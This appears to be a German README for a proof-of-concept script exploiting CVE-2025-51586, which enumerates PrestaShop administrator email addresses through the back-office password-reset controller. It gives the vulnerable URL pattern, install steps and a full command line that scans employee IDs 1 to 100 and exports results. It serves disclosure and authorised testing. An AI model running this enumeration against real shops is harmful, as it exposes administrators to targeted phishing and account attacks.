
PrestaShop AdminLogin E-Mail-Enumeration PoC - CVE-2025-51586. Dieses Repository stellt einen ethischen Proof-of-Concept (PoC) für die PrestaShop-Schwachstelle bereit, die eine Benutzer-Enumeration über den Passwort-Reset-Mechanismus von AdminLogin ermöglicht. Es erläutert die Auswirkungen, die Einrichtung und die Verwendung des PoC-Skripts.
Dieses Repository enthält einen ethischen Proof-of-Concept (PoC) für die Schwachstelle CVE-2025-51586, die PrestaShop-Versionen 1.7.x — 8.2.2 betrifft.
Der PoC zählt Administrator-E-Mail-Adressen über den Passwort-Zurücksetzungs-Mechanismus des Back Office auf (AdminLogin-Controller).
https://domain.tld/admin/index.php?controller=AdminLogin&reset=1id_employee und ein ungültiges reset_token an<input name="reset_email" value="[email protected]">Offizielles Advisory: Friends of Presta Security
Gemeldet vom Friends of Presta Security Team (Advisory veröffentlicht am 4. September 2025).
Dieser PoC dient ausschließlich Bildungs- und autorisierten Testzwecken. Verwenden Sie ihn nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Genehmigung haben. Der Autor und die Mitwirkenden sind nicht für Missbrauch verantwortlich.
Repository klonen und Abhängigkeiten installieren:
git clone https://github.com/7h30th3r0n3/CVE-2025-51586-PrestaShop-PoC.git
cd CVE-2025-51586-PrestaShop-PoC
pip install requests beautifulsoup4 rich
python3 cve_2025_51586_enum.py \
-u "https://target/admin/index.php?controller=AdminLogin&reset=1" \
-s 1 -e 100 -m POST -t invalidtoken123 --delay 0.5 --timeout 10 --export results.csv
PoC entwickelt von 7h30th3r0n3. Die Schwachstelle wurde vom Friends of Presta Security Team entdeckt.